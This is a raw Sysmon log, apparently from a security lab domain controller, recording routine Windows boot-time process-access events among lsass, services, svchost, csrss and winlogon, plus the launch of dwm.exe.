13:09:28.322{08A6967A-4286-6000-0B00-000000009A01}852892C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000822Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.322{08A6967A-4286-6000-0A00-000000009A01}844932C:\Windows\system32\services.exe{08A6967A-4288-6000-1200-000000009A01}1232C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000821Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.322{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1200-000000009A01}1232C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000820Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.322{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4288-6000-1400-000000009A01}1276C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000819Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.322{08A6967A-4286-6000-0A00-000000009A01}8441220C:\Windows\system32\services.exe{08A6967A-4288-6000-1400-000000009A01}1276C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+4c6c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000818Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.322{08A6967A-4286-6000-0B00-000000009A01}852892C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000817Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.322{08A6967A-4287-6000-0C00-000000009A01}5881028C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000816Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.322{08A6967A-4287-6000-0C00-000000009A01}5881028C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000815Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.322{08A6967A-4286-6000-0B00-000000009A01}852892C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000814Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.322{08A6967A-4286-6000-0800-000000009A01}716732C:\Windows\system32\csrss.exe{08A6967A-4288-6000-1300-000000009A01}1256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000813Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.322{08A6967A-4286-6000-0900-000000009A01}8001064C:\Windows\system32\winlogon.exe{08A6967A-4288-6000-1300-000000009A01}1256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\SYSTEM32\dwminit.dll+2d11|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000812Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.331{08A6967A-4288-6000-1300-000000009A01}1256C:\Windows\System32\dwm.exe10.0.14393.0 (rs1_release.160715-1616)Desktop Window ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationdwm.exe"dwm.exe"C:\Windows\system32\Window Manager\DWM-1{08A6967A-4288-6000-21C4-000000000000}0xc4211SystemMD5=C89F159A577F19F7F03C73C98D29D841,SHA256=B3E37997C1C62DD90D69EF83D6A6FC782BF9A5B8AD04A0D1528A8B7FA31AA408,IMPHASH=DDB7DE3741333EE031929A760FCD4542{08A6967A-4286-6000-0900-000000009A01}800C:\Windows\System32\winlogon.exewinlogon.exe 10341000x8000000000000000811Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.322{08A6967A-4286-6000-0B00-000000009A01}852892C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0900-000000009A01}800C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1c030|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000810Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.322{08A6967A-4286-6000-0B00-000000009A01}852892C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0900-000000009A01}800C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000809Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.322{08A6967A-4286-6000-0B00-000000009A01}852892C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0900-000000009A01}800C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000808Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.322{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000807Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.322{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000806Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.322{08A6967A-4286-6000-0B00-000000009A01}852976C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000805Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.322{08A6967A-4286-6000-0A00-000000009A01}8441208C:\Windows\system32\services.exe{08A6967A-4288-6000-1100-000000009A01}1192C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000804Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.322{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1100-000000009A01}1192C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000803Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.322{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4288-6000-1200-000000009A01}1232C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000802Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.322{08A6967A-4286-6000-0A00-000000009A01}8441120C:\Windows\system32\services.exe{08A6967A-4288-6000-1200-000000009A01}1232C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d7ae|C:\Windows\system32\services.exe+4c6c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000801Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.322{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000800Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.322{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000799Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.322{08A6967A-4286-6000-0B00-000000009A01}852976C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000798Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.307{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4288-6000-1100-000000009A01}1192C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000797Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.307{08A6967A-4286-6000-0A00-000000009A01}8441112C:\Windows\system32\services.exe{08A6967A-4288-6000-1100-000000009A01}1192C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+52f1|C:\Windows\system32\services.exe+d7ae|C:\Windows\system32\services.exe+4c6c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 